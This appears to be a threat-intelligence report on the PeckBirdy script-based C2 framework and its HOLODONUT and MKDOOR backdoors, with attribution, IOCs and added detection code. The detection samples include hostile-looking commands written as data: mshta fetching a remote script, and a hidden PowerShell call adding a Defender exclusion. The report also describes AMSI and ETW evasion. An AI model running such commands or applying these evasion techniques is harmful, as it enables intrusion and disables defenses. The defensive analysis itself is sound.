PeckBirdy: Newly Discovered Script-Based C2 Framework Tied to Cyber Operations Targeting Gambling Firms and Asian Governments

Since early 2023, multiple targeted intrusion campaigns have been observed leveraging a previously undocumented script-based command-and-control (C2) framework that we track internally as PeckBirdy. This framework has been actively used in operations targeting the Chinese online gambling sector, as well as government entities and private organizations across Asia.

PeckBirdy stands out for its design choices. It provides command-and-control, payload delivery, and lateral-movement support, yet it is implemented almost entirely in JScript, Microsoft's legacy ECMAScript 3-era scripting dialect. That choice lets one code base run in a browser, under mshta.exe or wscript.exe, inside Classic ASP, and in a .NET host, and lets the operators lean on living-off-the-land binaries (LOLBins) that are already present on every Windows system. The result is a small forensic footprint and good survivability in locked-down environments.

Our investigation identified two major campaigns leveraging PeckBirdy:

  • SHADOW-VOID-044, primarily focused on watering-hole attacks against Chinese gambling platforms
  • SHADOW-EARTH-045, targeting Asian government systems and private organizations

In addition to the framework itself, we identified two modular backdoors, HOLODONUT and MKDOOR, that were deployed as follow-on payloads in these operations. Based on infrastructure overlap, tooling, and tradecraft, both campaigns are assessed to be linked to China-aligned advanced persistent threat (APT) actors, with varying confidence levels.


What PeckBirdy Is and Why It Matters

PeckBirdy is best described as a script-based post-exploitation and delivery framework rather than a single piece of malware. It acts as a flexible controller that can:

  • Serve malicious scripts during watering-hole attacks
  • Function as a reverse shell server
  • Act as a full C2 channel for backdoors during later stages of intrusion
  • Dynamically adapt its behavior depending on the execution environment

Rather than dropping a compiled implant, PeckBirdy fetches its framework script on demand and runs it inside an interpreter that is already present (a browser, mshta.exe, wscript.exe, or a .NET host). Much of the activity therefore leaves little on disk and blends with legitimate script execution, which makes detection and attribution noticeably harder.


Affected Industries and Organizations

Primary Targets

  • Online gambling platforms operating in mainland China
  • Government agencies in Southeast Asia
  • Educational institutions
  • Private enterprises hosting IIS or web-facing infrastructure

Impacted Functions

  • Authentication portals and login pages
  • Public-facing websites used as watering holes
  • Internal enterprise networks during lateral movement
  • Endpoints targeted for long-term persistence

The attacks indicate a focus on credential harvesting, initial access at scale, and selective deployment of high-value backdoors.


In-The-Wild Activity Overview

Campaign SHADOW-VOID-044

Beginning in 2023, numerous Chinese gambling websites were found injected with malicious JavaScript code. These injected scripts redirected visitors to remote PeckBirdy servers, where the main framework script was dynamically delivered and executed in the victim’s browser.

Once executed, PeckBirdy displayed fraudulent software update pages impersonating Google Chrome updates to lure victims into downloading and running malicious executables. The browser stage can only run page-level script, so this social-engineering step is what moved the operation from a web session to a foothold on the host: the executables acted as loaders or backdoors, marking the transition from initial access to persistent compromise.

This campaign relied heavily on:

  • Compromised gambling websites
  • Script injection into legitimate content
  • User-driven execution through social engineering

Campaign SHADOW-EARTH-045

In mid-2024, a second campaign was identified targeting government entities and private organizations across Asia. Unlike SHADOW-VOID-044, this operation focused more on credential harvesting and internal movement rather than mass victimization.

Observed activity included:

  • Injection of PeckBirdy scripts into government login portals
  • Execution of PeckBirdy via MSHTA as a remote access channel
  • Use of custom .NET launchers that embed the Microsoft Script Control (ScriptControl, implemented in msscript.ocx) to execute JScript outside a browser or script host

This campaign demonstrates PeckBirdy’s versatility as both an initial access tool and a post-exploitation framework.


How PeckBirdy Works

Execution Environments

PeckBirdy is designed to run in multiple execution contexts, including:

  • Web browsers
  • MSHTA
  • WScript
  • Classic ASP
  • Node.js
  • .NET applications via ScriptControl

The framework detects its execution environment at runtime by checking for environment-specific objects such as:

  • window (browser)
  • process (Node.js)
  • response (ASP)
  • APPLICATION tag (HTA)

Each environment unlocks different capabilities, ranging from limited browser-only actions to full system interaction on Windows hosts.
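The order of those checks matters more than the list suggests: mshta.exe renders HTML in the Internet Explorer engine, so an HTA also exposes window and document, and the APPLICATION check has to come before the browser check. The following ES3-compatible JavaScript is an added illustration of that probing logic, not PeckBirdy's own code; the element name used for the HTA check and the use of ActiveXObject as the test for shell access are assumptions.

```javascript
// Added example: environment probing in the style the report describes.
// Written to ES3 so it would also load under JScript; every host object is
// tested with typeof, so probing for an object that does not exist never throws.

// Returns "hta", "browser", "wscript", "node", "asp" or "unknown".
// `g` is the global object to inspect, passed in explicitly so the logic
// can be exercised with fake globals as well as with the real one.
function detectEnvironment(g) {
  // HTA first: mshta.exe also exposes window and document, so the presence
  // of an APPLICATION element (assumed element name) is what sets it apart.
  if (typeof g.window !== "undefined" &&
      typeof g.document !== "undefined" &&
      typeof g.document.getElementsByTagName === "function" &&
      g.document.getElementsByTagName("APPLICATION").length > 0) {
    return "hta";
  }
  if (typeof g.window !== "undefined") {
    return "browser";
  }
  // Windows Script Host exposes the WScript object and has no window.
  if (typeof g.WScript !== "undefined") {
    return "wscript";
  }
  // Node.js: process.versions.node distinguishes it from other hosts that
  // happen to define a "process" global.
  if (typeof g.process !== "undefined" &&
      typeof g.process.versions === "object" &&
      g.process.versions !== null &&
      typeof g.process.versions.node === "string") {
    return "node";
  }
  // Classic ASP under IIS exposes the intrinsic Response object
  // (capitalised: JScript is case-sensitive).
  if (typeof g.Response !== "undefined") {
    return "asp";
  }
  return "unknown";
}

// Shell access on Windows script hosts (WScript, HTA, IE with ActiveX enabled)
// comes from WScript.Shell via ActiveXObject or WScript.CreateObject; without
// either, the script is limited to what the hosting page or runtime allows.
function canSpawnShell(g) {
  return typeof g.ActiveXObject !== "undefined" || typeof g.WScript !== "undefined";
}

// Obtain the real global object. Function("return this")() runs in
// non-strict mode and therefore returns the global even from strict or
// module code; the fallback covers hosts that forbid dynamic code.
function globalObject() {
  try {
    return Function("return this")();
  } catch (e) {
    return {};
  }
}

function detectHere() {
  return detectEnvironment(globalObject());
}
```

Run under Node the probe reports "node" and no shell access; the same file loaded by mshta.exe or wscript.exe would report "hta" or "wscript" and shell access, which is the branching point at which a framework like this decides what second stage to request.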


Server APIs and Script Delivery

PeckBirdy servers expose simple HTTP(S) endpoints that return different landing scripts depending on the request path and ATTACK_ID. Each ATTACK_ID is a unique 32-character value that determines configuration and behavior.

Observed API patterns:

  • /[ATTACK_ID] – main framework script
  • /[ATTACK_ID]/hta – MSHTA launcher
  • /[ATTACK_ID]/html – browser-based payload
  • /[ATTACK_ID]/wscript – WScript execution

Each delivered script contains embedded configuration values, allowing the operator to fine-tune behavior per campaign or victim set.


Victim Identification and Tracking

PeckBirdy generates a unique victim identifier using different techniques depending on the environment:

  • On Windows hosts, it attempts to extract hardware identifiers from the motherboard and disk
  • If unavailable, it falls back to a randomly generated 32-character string

To maintain persistence:

  • In browsers, the ID is stored in a cookie whose name begins with Hm_lvt_, the prefix Baidu Tongji (Baidu Analytics) uses on most Chinese websites. A genuine Hm_lvt_ value is a comma-separated list of Unix timestamps, which gives defenders something concrete to compare against
  • On Windows hosts, the ID is written to a file named ___unique_id___ in the user's temporary directory

This is re-identification rather than persistence: nothing in the mechanism re-launches the framework, but a returning victim can be recognized and served tailored content without any registry key, scheduled task or service that a persistence hunt would find.
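Two of these artifacts can be checked from proxy logs and captured Cookie headers alone. The following is an added detection sketch, not code from the report or from the framework: it flags request paths shaped like the server API described under Server APIs and Script Delivery, and Hm_lvt_ cookies whose value does not look like Baidu Tongji's comma-separated Unix timestamps. The log format and the sample lines are constructed, and the character set assumed for ATTACK_ID (letters and digits) is an assumption to adjust against real samples.

```javascript
// Added example: two detections over web-proxy logs, built from the report's
// description of the PeckBirdy server API and its victim-tracking cookie.

// Path shapes: /[ATTACK_ID], /[ATTACK_ID]/hta, /[ATTACK_ID]/html, /[ATTACK_ID]/wscript.
// ATTACK_ID is only described as a 32-character value; the character class
// below (letters and digits) is an assumption.
var PECKBIRDY_PATH = /^\/([A-Za-z0-9]{32})(?:\/(hta|html|wscript))?\/?$/;

// Returns { attackId, variant } for a matching path, otherwise null.
function classifyPath(path) {
  var m = PECKBIRDY_PATH.exec(path.split("?")[0]);
  return m ? { attackId: m[1], variant: m[2] || "main" } : null;
}

// Genuine Baidu Tongji Hm_lvt_* cookies carry one or more 10-digit Unix
// timestamps separated by commas. Anything else under that prefix is an
// impostor, which is exactly what the report describes.
var HM_LVT_VALUE = /^\d{10}(?:,\d{10})*$/;

// Parse a Cookie header into a name -> value map ("-" means no cookie).
function parseCookieHeader(header) {
  var cookies = {};
  if (!header || header === "-") { return cookies; }
  var parts = header.split(";");
  for (var i = 0; i < parts.length; i++) {
    var eq = parts[i].indexOf("=");
    if (eq < 0) { continue; }
    var name = parts[i].slice(0, eq).replace(/^\s+|\s+$/g, "");
    var value = parts[i].slice(eq + 1).replace(/^\s+|\s+$/g, "");
    cookies[name] = value;
  }
  return cookies;
}

// Names of Hm_lvt_ cookies whose value is not timestamp-shaped.
function suspiciousHmCookies(header) {
  var cookies = parseCookieHeader(header);
  var hits = [];
  for (var name in cookies) {
    if (name.indexOf("Hm_lvt_") === 0 && !HM_LVT_VALUE.test(cookies[name])) {
      hits.push(name);
    }
  }
  return hits;
}

// Constructed log format (tab-separated): time, client, host, path, Cookie header or "-".
function scanLog(lines) {
  var alerts = [];
  for (var i = 0; i < lines.length; i++) {
    var f = lines[i].split("\t");
    if (f.length < 5) { continue; }
    var time = f[0], client = f[1], host = f[2], path = f[3], cookie = f[4];
    var api = classifyPath(path);
    if (api) {
      alerts.push({ time: time, client: client, host: host,
                    reason: "peckbirdy-api:" + api.variant, attackId: api.attackId });
    }
    var bad = suspiciousHmCookies(cookie);
    if (bad.length) {
      alerts.push({ time: time, client: client, host: host,
                    reason: "hm_lvt-impostor:" + bad.join(",") });
    }
  }
  return alerts;
}

// Constructed sample traffic (not telemetry from the report). Lines 2 and 3
// fetch the main script and the MSHTA launcher; line 4 carries a fake Hm_lvt_.
var SAMPLE_LOG = [
  "2024-06-03T10:12:07Z\t10.0.0.15\tbet.example\t/index.html\tHm_lvt_0123456789abcdef0123456789abcdef=1717409527",
  "2024-06-03T10:12:09Z\t10.0.0.15\tcdn.example\t/a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6\t-",
  "2024-06-03T10:12:40Z\t10.0.0.15\tcdn.example\t/a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6/hta\t-",
  "2024-06-03T10:13:02Z\t10.0.0.15\tbet.example\t/login\tHm_lvt_0123456789abcdef0123456789abcdef=a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6; session=abc",
  "2024-06-03T10:13:05Z\t10.0.0.22\tbet.example\t/static/app.js\tHm_lvt_0123456789abcdef0123456789abcdef=1717409527,1717412000"
];

function demoScanLog() {
  return scanLog(SAMPLE_LOG);
}
```

The path rule will also fire on content-hashed asset names of exactly 32 characters, so in production pair it with host reputation or the absence of a file extension; the cookie rule has far fewer benign collisions because the genuine value format is so rigid.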


Command-and-Control Communication

PeckBirdy supports multiple communication channels:

  1. WebSocket (preferred)
  2. Flash-based TCP sockets (legacy fallback; only usable where a Flash Player runtime is still installed, since Adobe ended support at the end of 2020)
  3. Comet-style HTTP(S) long polling, including a LocalComet variant

Once a channel is up, every message is:

  • Encrypted with AES
  • Base64-encoded for transport
  • Keyed from the ATTACK_ID value

Because the ATTACK_ID is embedded in every delivered landing script, an analyst who captures that script already holds the key material; decrypting recorded C2 traffic then only requires reproducing the AES mode and key derivation the script uses.

Observed second-stage scripts include functionality for:

  • Cookie theft
  • Script execution
  • Payload delivery
  • Reverse shell creation

Associated Backdoors

HOLODONUT

HOLODONUT is a .NET-based modular backdoor deployed via a lightweight downloader tracked as NEXLOAD.

Execution Chain

  1. Initial connection sends a {string}#{string} marker
  2. Payload is retrieved and XOR-decrypted
  3. The entry point of the decrypted payload is passed as the callback to EnumWindows(), so the first transfer of control into the payload comes from a Windows API rather than from a direct call in the loader
  4. Payload runs entirely in memory

Defense Evasion

  • AMSI bypass
  • ETW patching
  • In-memory execution using Donut-style techniques

Capabilities

  • Plugin-based architecture
  • Remote plugin load, execute, unload
  • Host reconnaissance
  • Controlled sleep and termination

MKDOOR

MKDOOR is a two-stage modular backdoor delivered through fake browser update installers.

Downloader Behavior

  • Adds itself to the Microsoft Defender exclusion list (Defender records this configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log)
  • Uses URLs masquerading as Microsoft support pages
  • Downloads the core backdoor module

Backdoor Behavior

  • Establishes C2 using Windows activation-themed URLs
  • Receives modular payloads from the server
  • Supports install, execute, sleep, and removal commands

This design allows operators to deploy only the capabilities needed for a specific target.


Attribution Assessment

SHADOW-VOID-044

This campaign shows strong links to China-aligned threat actors, based on:

  • Infrastructure overlap with known gambling-focused operations
  • Hosting of GRAYRABBIT variants
  • Shared C2 domains and signing certificates
  • Tactical overlap with previously observed campaigns

Confidence level: Moderate to High


SHADOW-EARTH-045

This campaign demonstrates tradecraft consistent with Chinese state-aligned intrusion sets but lacks definitive overlaps.

Indicators include:

  • Government-focused targeting
  • MSHTA-based execution
  • Infrastructure previously linked to Asia-focused espionage

Confidence level: Low to Moderate


Indicators of Compromise (IOCs)

Domains

  • center.myrnicrosoft[.]com
  • mkdmcdn[.]com
  • oss-cdn[.]com
  • github.githubassets[.]net

IP Addresses

  • 47.238.219[.]111
  • 47.238.184[.]9

URL paths (observed on the domains above)

  • /en-us/howtotell/default.aspx, consistent with the Microsoft support-page lure used by the MKDOOR downloader
  • /en-us/windows/activate-windows-c39005d4-95ee-b91e-b399-2820fda32227, consistent with the Windows activation-themed C2 used by the MKDOOR backdoor

File Artifacts

  • ___unique_id___
  • Fake Chrome update executables
  • MKDOOR downloader binaries

Behavioral Indicators

  • mshta.exe launched with a remote http(s) URL on its command line; a local .hta path is the benign shape to compare against
  • Browser cookies whose name begins with Hm_lvt_ but whose value is a random 32-character string rather than the comma-separated Unix timestamps Baidu Tongji sets
  • Defender exclusions added programmatically, whether through Add-MpPreference or direct writes to the Exclusions registry keys; Defender logs the change as Event ID 5007
  • Local high-port HTTP listeners for infection validation
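The behavioral indicators above translate directly into host-level rules. As an added example (constructed events, not telemetry from the report), the rules below run over records shaped like Sysmon process-creation (Image, CommandLine, ParentImage), file-creation (TargetFilename) and image-load (ImageLoaded) fields. The field names follow Sysmon's, the sample events are made up, and the allowlist in the ScriptControl rule is an assumption to tune locally.

```javascript
// Added example: host-side rules for the report's behavioral indicators, run
// over constructed event records. Field names follow Sysmon's; events are made up.

function baseName(p) {
  if (!p) { return ""; }
  var i = Math.max(p.lastIndexOf("\\"), p.lastIndexOf("/"));
  return p.slice(i + 1).toLowerCase();
}

var RULES = [
  {
    id: "mshta-remote-script",
    // MSHTA launched with a remote URL: the report's "MSHTA executing remote JavaScript".
    test: function (e) {
      return baseName(e.Image) === "mshta.exe" && /https?:\/\//i.test(e.CommandLine || "");
    }
  },
  {
    id: "defender-exclusion-added",
    // Exclusions added from a command line (Add-MpPreference) or by writing the
    // Exclusions registry keys. Defender also logs the change as Event ID 5007.
    test: function (e) {
      var c = e.CommandLine || "";
      return (/Add-MpPreference/i.test(c) && /-Exclusion(Path|Process|Extension)/i.test(c)) ||
             /Windows Defender\\Exclusions\\/i.test(c);
    }
  },
  {
    id: "peckbirdy-unique-id-file",
    // The ___unique_id___ marker the framework writes on Windows hosts.
    test: function (e) { return baseName(e.TargetFilename) === "___unique_id___"; }
  },
  {
    id: "scriptcontrol-host-load",
    // msscript.ocx implements the ScriptControl COM object used by the .NET
    // launchers seen in SHADOW-EARTH-045. Loads by processes outside a local
    // allowlist deserve a look; the allowlist here is an assumption.
    test: function (e) {
      var allow = { "wscript.exe": true, "cscript.exe": true };
      return baseName(e.ImageLoaded) === "msscript.ocx" && !allow[baseName(e.Image)];
    }
  }
];

// Rule IDs that match one event.
function evaluate(event) {
  var hits = [];
  for (var i = 0; i < RULES.length; i++) {
    if (RULES[i].test(event)) { hits.push(RULES[i].id); }
  }
  return hits;
}

// Matching events with their rule IDs, in input order.
function scanEvents(events) {
  var out = [];
  for (var i = 0; i < events.length; i++) {
    var hits = evaluate(events[i]);
    if (hits.length) { out.push({ index: i, image: events[i].Image, rules: hits }); }
  }
  return out;
}

// Constructed events: four that should fire, two benign look-alikes.
var SAMPLE_EVENTS = [
  { Image: "C:\\Windows\\System32\\mshta.exe",
    CommandLine: "mshta.exe https://cdn.example/a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6/hta",
    ParentImage: "C:\\Windows\\explorer.exe" },
  { Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell -nop -w hidden Add-MpPreference -ExclusionPath C:\\Users\\Public\\update",
    ParentImage: "C:\\Users\\Public\\update\\ChromeUpdate.exe" },
  { Image: "C:\\Windows\\System32\\wscript.exe",
    TargetFilename: "C:\\Users\\bob\\AppData\\Local\\Temp\\___unique_id___" },
  { Image: "C:\\Users\\Public\\update\\ChromeUpdate.exe",
    ImageLoaded: "C:\\Windows\\System32\\msscript.ocx" },
  { Image: "C:\\Windows\\System32\\mshta.exe",
    CommandLine: "mshta.exe C:\\Program Files\\Vendor\\tool.hta",
    ParentImage: "C:\\Windows\\explorer.exe" },
  { Image: "C:\\Windows\\System32\\wscript.exe",
    ImageLoaded: "C:\\Windows\\System32\\msscript.ocx" }
];

function demoScanEvents() {
  return scanEvents(SAMPLE_EVENTS);
}
```

The two benign events show the tuning boundary: mshta.exe running a local .hta and a script host loading msscript.ocx are both ordinary, so the rules key on the remote URL and on the loading process rather than on the binary names alone.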

Conclusion

PeckBirdy represents a highly adaptable and stealth-focused framework designed to operate across diverse environments while minimizing forensic visibility. Its reliance on script-based execution, dynamic payload delivery, and LOLBin abuse reflects a broader trend among China-aligned threat actors toward low-noise, high-flexibility intrusion tooling.

The combination of PeckBirdy with modular backdoors such as HOLODONUT and MKDOOR enables operators to tailor attacks precisely to victim environments, making detection and remediation increasingly challenging.

Organizations operating public-facing web infrastructure, especially in high-risk regions or industries, should treat script-level anomalies and LOLBin abuse as high-priority indicators of compromise, as these techniques are no longer edge cases but core components of modern intrusion campaigns.